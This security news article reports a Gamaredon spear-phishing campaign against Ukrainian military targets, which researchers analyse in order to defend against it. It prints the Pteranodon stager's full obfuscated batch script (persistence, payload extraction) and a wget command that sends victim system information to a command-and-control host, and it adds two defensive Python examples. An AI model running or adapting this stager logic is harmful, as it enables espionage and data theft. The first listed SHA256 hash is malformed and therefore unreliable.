Security researchers at Yoroi-Cybaze ZLab uncovered a new campaign carried out by the Russian state actor dubbed Gamaredon.


A few days after the publication of our technical article on the evidence of possible APT28 interference in the Ukrainian elections, we spotted another signal of a sneakier ongoing operation.

This campaign, instead, seems to be linked to another Russian hacking group: Gamaredon. The Gamaredon APT was first spotted in 2013; in 2015, researchers at LookingGlass shared the details of a cyber espionage operation tracked as Operation Armageddon that targeted other Ukrainian entities. Their “special attention” to Eastern European countries was also confirmed by CERT-UA, the Ukrainian Computer Emergency Response Team.

The discovered attack appears to be designed to lure military personnel: it leverages a legitimate document of the “State of the Armed Forces of Ukraine” dated 2nd April 2019.

Figure 1: Fake document shown after infection

For this reason, the Cybaze-Yoroi ZLAB team dissected this suspicious sample to confirm the possible link with Russian threat actors.

Technical Analysis

The origin of the infection is an executable file pretending to be an RTF document.

Sha256: 41a6e54e7ac2d488151d2b40055f3d7cacce7fb53e9d33c1e3effd4fce8014
Threat: Gamaredon Pteranodon stager (SFX file)
Ssdeep: 12288:VpRN/nV+Nn3I4Wyawz2O7TE+sNEAMqdJnGB6q5c7pQbaOwWsAsK0iR7bkfeanZ8O:VpT/nV+N3I

Table 1: Information about analyzed sample

Actually, the file is a Self Extracting Archive (SFX) claiming to be part of some Oracle software, carrying an invalid signature. The certificate's expiration date is set to the 16th of March 2019.

Figure 2: Fake Oracle certificate with an expiration date set on 16th of March 2019

A first glance inside the SFX archive reveals four different files. One of them is a batch file containing the actual infection routine.

Figure 3: Files contained in SFX archive

@echo off
set xNBsBXS=%random%*JjuCBOS
For %%q In (wireshark procexp) do (TaskList /FI "ImageName EQ %%q.exe" | Find /I "%%q.exe")
If %ErrorLevel% NEQ 1 goto exit
If SddlzCf==x86 Set WqeZfrx=x64
if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOS
set "ldoGIUv=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
CEFNPKL
If SddlzCf==x86 Set WqeZfrx=x64
set "UlHjSKD=%USERPROFILE%\"
set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXS
set fnQWAZC=winsetup
set xNBsBXS=%random%*JjuCBOS
set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXS
set "paJvVjr=Document"
if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOS
set eBqwVLK=%fnQWAZC%.lnk
CEFNPKL
if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOS
set YFCaOEf=28262
set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXS
set vvozoFB=11326
set lDwWuLo=26710
If SddlzCf==x86 Set WqeZfrx=x64
set prJqIBB=dcthfdyjdfcdst,tv
set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXS
if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOS
taskkill /f /im %fnQWAZC%.exe
CEFNPKL
RENAME "%lDwWuLo%" %lDwWuLo%.exe
set xNBsBXS=%random%*JjuCBOS
%lDwWuLo%.exe "-p%prJqIBB%"
set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXS
copy /y "%fnQWAZC%" "%UlHjSKD%%fnQWAZC%.exe"
if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOS
if exist "%UlHjSKD%%fnQWAZC%.exe" call :GhlJKaG
If SddlzCf==x86 Set WqeZfrx=x64
if not exist "%UlHjSKD%%fnQWAZC%.exe" call :PEEnqrL
set xNBsBXS=%random%*JjuCBOS
RENAME "%YFCaOEf%" %eBqwVLK%
if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOS
copy "%eBqwVLK%" "%ldoGIUv%" /y
set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXS
RENAME "%vvozoFB%" "%paJvVjr%.docx"
if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOS
"%CD%\%paJvVjr%.docx"
set xNBsBXS=%random%*JjuCBOS
exit /b

:GhlJKaG
if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOS
start "" "%UlHjSKD%%fnQWAZC%.exe"
CEFNPKL
exit /b

:PEEnqrL
set xNBsBXS=%random%*JjuCBOS
RENAME "%fnQWAZC%" %fnQWAZC%.exe
::6
start "" "%fnQWAZC%.exe"
If SddlzCf==x86 Set WqeZfrx=x64
exit /b

First, the batch script checks whether Wireshark or Process Explorer is running, querying the tasklist.exe utility. Then it renames the “11326” file to “Document.docx” and opens it: this is the decoy document seen in Figure 1.

The third step is to extract the contents of the password-protected archive named “26710”. The script uses the hard-coded password “dcthfdyjdfcdst,tv” to extract its content, placing it at “%USERPROFILE%\winsetup.exe” and creating a LNK shortcut in the “%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup” directory to ensure persistence.
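As an added illustration (not code from the Yoroi report), the following Python script strips the junk instructions seen in the listing above and resolves the hard-coded variables, recovering the stager's real command sequence. The embedded input is a shortened excerpt of that listing with path separators restored; the junk `%random%` assignments, literal-vs-literal `if` lines and bare filler tokens are dropped because they never influence the commands that run.

```python
import re

# Shortened excerpt of the stager's batch script from the listing above
# (junk lines deliberately kept so the filter has something to remove).
STAGER = r'''@echo off
set xNBsBXS=%random%*JjuCBOS
If SddlzCf==x86 Set WqeZfrx=x64
if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOS
set "ldoGIUv=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
CEFNPKL
set "UlHjSKD=%USERPROFILE%\"
set fnQWAZC=winsetup
set "paJvVjr=Document"
set eBqwVLK=%fnQWAZC%.lnk
set YFCaOEf=28262
set vvozoFB=11326
set lDwWuLo=26710
set prJqIBB=dcthfdyjdfcdst,tv
taskkill /f /im %fnQWAZC%.exe
RENAME "%lDwWuLo%" %lDwWuLo%.exe
%lDwWuLo%.exe "-p%prJqIBB%"
copy /y "%fnQWAZC%" "%UlHjSKD%%fnQWAZC%.exe"
RENAME "%YFCaOEf%" %eBqwVLK%
copy "%eBqwVLK%" "%ldoGIUv%" /y
RENAME "%vvozoFB%" "%paJvVjr%.docx"
'''
SET_RE = re.compile(r'^set\s+"?([A-Za-z_]\w*)=([^"]*)"?$', re.I)
VAR_RE = re.compile(r'%([A-Za-z_]\w*)%')
JUNK_IF_RE = re.compile(r'^if\s+\w+==\w+\s', re.I)   # literal==literal, never true

def deobfuscate(script):
    """Return the real commands with %VAR% references resolved and junk dropped."""
    env, commands = {}, []
    expand = lambda s: VAR_RE.sub(lambda m: env.get(m.group(1), m.group(0)), s)
    for line in script.splitlines():
        line = line.strip()
        m = SET_RE.match(line)
        if m:
            if '%random%' not in m.group(2).lower():   # %random% sets are filler
                env[m.group(1)] = expand(m.group(2))
            continue
        if not line or line.startswith('@echo') or JUNK_IF_RE.match(line):
            continue
        if re.fullmatch(r'[A-Za-z]{6,}', line):         # bare token such as CEFNPKL
            continue
        commands.append(expand(line))
    return commands

if __name__ == '__main__':
    print('\n'.join(deobfuscate(STAGER)))
```

Environment variables such as %APPDATA% that the script never assigns are left untouched, so the output shows the persistence path exactly as the text describes it.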

Sha256: 653a4205fa4bb7c58ef1513cac4172398fd5d65cab78bef7ced2d2e828a1e4b5
Threat: Gamaredon Pteranodon stager (SFX)
Ssdeep: 12288:9pRN/nV+Nn4mNoks/EysKvqjigldJuFjBqg9DmTBs34I8:9pT/nV+N4QokKK7zg9qgQI8

Table 2: Information about SFX stager

This additional file is an SFX archive containing another script and a PE32 binary.

Figure 4: Files contained in SFX archive

The “MicrosoftCreate.exe” file is the UPX-packed version of the “wget” tool compiled for Windows: a utility for non-interactive HTTP downloads and uploads, commonly used by sysadmins and sometimes abused by threat actors.

The actual malicious logic of the Pteranodon implant is contained within the “30347.cmd” script. Besides junk instructions and obfuscation, the script gathers information about the compromised machine through the “systeminfo.exe” command. The results are stored in the file “fnQWAZC” and then sent to the command and control server “librework[.]ddns[.]net”, leveraging the wget utility found earlier.

Figure 5: The C2 and the obfuscation technique

MicrosoftCreate.exe --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0" --post-="versiya=arm_02.04&comp=ADMIN-PC&id=ADMIN-PC_del&sysinfo=Nome host:                            ADMIN-PC+###……."

Figure 6: Information about victim machine sent to C2
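The check-in above is a plain form-encoded POST, so its victim fields can be pulled out of proxy or packet-capture records. The following Python example (added here, not part of the original analysis) parses constructed proxy records for the “versiya/comp/id/sysinfo” field set and reports the victim identifiers together with the two corroborating signals the article points out, the dynamic-DNS C2 host and the fixed Firefox 51 user agent.

```python
from urllib.parse import parse_qs

# Constructed proxy records (method, host, user-agent, body): the first mimics the
# check-in shown in Figure 6, the other two are benign noise.
RECORDS = [
    ("POST", "librework.ddns.net",
     "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0",
     "versiya=arm_02.04&comp=ADMIN-PC&id=ADMIN-PC_del&sysinfo=Host+Name%3A+ADMIN-PC"),
    ("POST", "intranet.example", "Mozilla/5.0 (X11; Linux x86_64) Firefox/66.0",
     "user=alice&action=login"),
    ("GET", "cdn.example", "Wget/1.20", ""),
]

BEACON_FIELDS = {"versiya", "comp", "id", "sysinfo"}   # fields seen in Figure 6

def parse_beacon(method, host, user_agent, body):
    """Return the victim fields of a Pteranodon-style check-in, or None."""
    if method != "POST":
        return None
    fields = parse_qs(body, keep_blank_values=True)
    if not BEACON_FIELDS.issubset(fields):
        return None
    return {
        "host": host,
        "version": fields["versiya"][0],
        "computer": fields["comp"][0],
        "victim_id": fields["id"][0],
        "sysinfo": fields["sysinfo"][0],
        # corroborating signals, not required for a match
        "ddns": host.endswith(".ddns.net"),
        "fixed_ua": user_agent.endswith("Firefox/51.0"),
    }

def find_beacons(records):
    """Run parse_beacon over every record and keep the hits."""
    return [hit for hit in (parse_beacon(*r) for r in records) if hit]
```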

The malware also schedules the execution of two further actions.

Figure 7: Persistence through task schedule

The first one tries to contact “bitwork[.]ddns[.]net” to download a “setup.exe” file and store it in the same folder. The other file, “ie_.exe”, is stored in the “%APPDATA%\Roaming\Microsoft\IE” folder: despite the different name, it is actually another copy of the wget tool.

Figure 8: Persistence through task schedule (II)

The second scheduled task runs every 32 minutes and executes the files downloaded by the previous task, a trick that has long been part of the Gamaredon arsenal. In fact, the recovered sample is part of the Pteranodon implant and matches its typical code patterns, showing no relevant changes with respect to previous variants.

Finally, investigating the “librework[.]ddns[.]net” domain, we discovered several other samples connecting to the same C2. All of them appeared in the wild during the first days of April, suggesting the command and control infrastructure might still be fully functional.

Figure 9: Other samples linked to the “librework[.]ddns[.]net” C2 (Source: VT)


The Pteranodon implant seems to have been constantly maintained by the Gamaredon APT group since 2013, a tool the attackers evidently found very effective, since they are still using it after such a long time. Apart from this technical consideration, it is quite interesting to notice how strong the Russian interest in Eastern Europe appears to be, alongside the other recent state-sponsored activities possibly aimed at interfering with Ukrainian politics (see “APT28 and Upcoming Elections: evidence of possible interference” and Part II), confirming this cyber threat is operating on several fronts.

Further details, including Indicators of Compromise and Yara rules, are reported in the analysis published on the Yoroi Blog.  

Pierluigi Paganini

(SecurityAffairs – Ukraine, Gamaredon)
